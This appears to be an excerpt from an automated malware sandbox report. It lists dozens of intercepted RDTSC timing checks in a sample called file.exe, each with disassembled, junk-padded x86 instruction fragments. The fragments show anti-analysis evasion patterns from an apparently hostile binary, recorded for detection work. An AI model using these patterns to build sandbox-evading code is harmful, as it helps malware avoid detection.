                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB918F second address: FB9193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9193 second address: FB919D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4C54696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1719 second address: FC171D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC171D second address: FC173D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FD4A4C546A4h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC009C second address: FC00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0373 second address: FC039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jno 00007FD4A4C54696h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jmp 00007FD4A4C546A0h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC039B second address: FC03B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c jns 00007FD4A4ED8666h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC03B7 second address: FC03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD4A4C54696h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC03C4 second address: FC03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0906 second address: FC0911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD4A4C54696h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1382 second address: FC138D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC138D second address: FC139E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FD4A4C546AFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC139E second address: FC13C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED8673h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007FD4A4ED8666h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC49D3 second address: FC49EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007FD4A4C54696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD4A4C5469Fh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1967 second address: FD19B1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4ED866Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007FD4A4ED8666h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jp 00007FD4A4ED867Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FD4A4ED8676h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1313 second address: FE1317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE117A second address: FE1184 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2DCE second address: FE2DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD4A4C546A5h 0x0000000a jmp 00007FD4A4C5469Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFFC6 second address: FFFFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFFCA second address: FFFFD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEF6C second address: FFEF8F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD4A4ED8666h 0x00000008 jmp 00007FD4A4ED866Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD4A4ED866Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEF8F second address: FFEFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD4A4C546A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFB1 second address: FFEFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFB5 second address: FFEFBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFBB second address: FFEFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF3C9 second address: FFF3F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 jmp 00007FD4A4C546A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD4A4C546BAh 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF3F2 second address: FFF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD4A4ED8670h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC6E second address: FFFC78 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD4A4C54696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC78 second address: FFFC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnp 00007FD4A4ED8666h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC87 second address: FFFCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD4A4C546A7h 0x0000000e jmp 00007FD4A4C546A1h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001756 second address: 100176E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD4A4ED8672h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100176E second address: 1001772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100417B second address: 1004180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004180 second address: 1004186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004186 second address: 100418A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100723F second address: 1007245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007245 second address: 100724B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100724B second address: 100724F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100724F second address: 1007277 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD4A4ED866Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 ja 00007FD4A4ED8668h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CBF second address: 4C80CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CC5 second address: 4C80CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CC9 second address: 4C80CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CD7 second address: 4C80CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, di 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CDF second address: 4C80CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CE5 second address: 4C80D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD4A4ED8674h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD4A4ED866Dh 0x00000019 jmp 00007FD4A4ED866Bh 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80D25 second address: 4C80D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500D0 second address: 4C500D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500D6 second address: 4C500F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD4A4C546A5h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500F6 second address: 4C50127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD4A4ED8671h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cl, bh 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50127 second address: 4C50159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A7h 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD4A4C5469Ch 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50159 second address: 4C5015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5015F second address: 4C50195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov edx, 3D03BCACh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+04h] 0x00000011 jmp 00007FD4A4C5469Bh 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 pushad 0x0000001a call 00007FD4A4C546A4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501EB second address: 4C501EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501EF second address: 4C501F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C709FF second address: 4C70A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70A03 second address: 4C70A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70A09 second address: 4C70A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD4A4ED866Dh 0x00000012 pop ecx 0x00000013 pushfd 0x00000014 jmp 00007FD4A4ED8671h 0x00000019 add si, 28D6h 0x0000001e jmp 00007FD4A4ED8671h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70A59 second address: 4C70AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e movsx edi, cx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FD4A4C546A2h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD4A4C546A7h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70AA5 second address: 4C70ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8674h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70ABD second address: 4C70AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD4A4C546A5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C705D3 second address: 4C7062C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4ED866Fh 0x00000009 sbb cx, A8CEh 0x0000000e jmp 00007FD4A4ED8679h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c movsx ebx, cx 0x0000001f mov cx, 8BE1h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD4A4ED8673h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7062C second address: 4C70681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C5469Fh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, ECA2h 0x00000016 pushfd 0x00000017 jmp 00007FD4A4C546A3h 0x0000001c adc ecx, 7B59B19Eh 0x00000022 jmp 00007FD4A4C546A9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70681 second address: 4C70687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70687 second address: 4C7068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70325 second address: 4C7034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD4A4ED8676h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7034A second address: 4C7036D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4C546A1h 0x00000009 jmp 00007FD4A4C5469Bh 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7036D second address: 4C703A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FD4A4ED8674h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD4A4ED8677h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C703A4 second address: 4C703D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4A4C5469Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80029 second address: 4C800A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD4A4ED8677h 0x00000011 and al, FFFFFF8Eh 0x00000014 jmp 00007FD4A4ED8679h 0x00000019 popfd 0x0000001a mov ebx, eax 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ax, 018Fh 0x00000023 mov dh, ah 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov ax, di 0x0000002c mov ah, bh 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007FD4A4ED8678h 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C800A7 second address: 4C800AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C900A8 second address: 4C900ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FD4A4ED8670h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 pushad 0x00000016 mov di, ax 0x00000019 popad 0x0000001a mov di, E98Ah 0x0000001e popad 0x0000001f and dword ptr [eax+04h], 00000000h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD4A4ED866Ch 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C900ED second address: 4C900F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C900F3 second address: 4C900F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C704FB second address: 4C70525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007FD4A4C5469Ch 0x0000000d jmp 00007FD4A4C546A5h 0x00000012 popfd 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70525 second address: 4C70570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov dx, si 0x0000000c mov edi, eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FD4A4ED866Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FD4A4ED8676h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FD4A4ED8670h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70570 second address: 4C70574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70574 second address: 4C70591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80BA5 second address: 4C80BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 01BC9522h 0x00000008 jmp 00007FD4A4C546A3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FD4A4C546A9h 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FD4A4C5469Eh 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov cl, bh 0x00000023 push ecx 0x00000024 pop ebx 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0D9B second address: 4CA0DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, FDh 0x00000005 mov di, F080h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD4A4ED8671h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0DBD second address: 4CA0DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0DD2 second address: 4CA0E08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD4A4ED8678h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E08 second address: 4CA0E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E0C second address: 4CA0E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E12 second address: 4CA0E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E18 second address: 4CA0E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
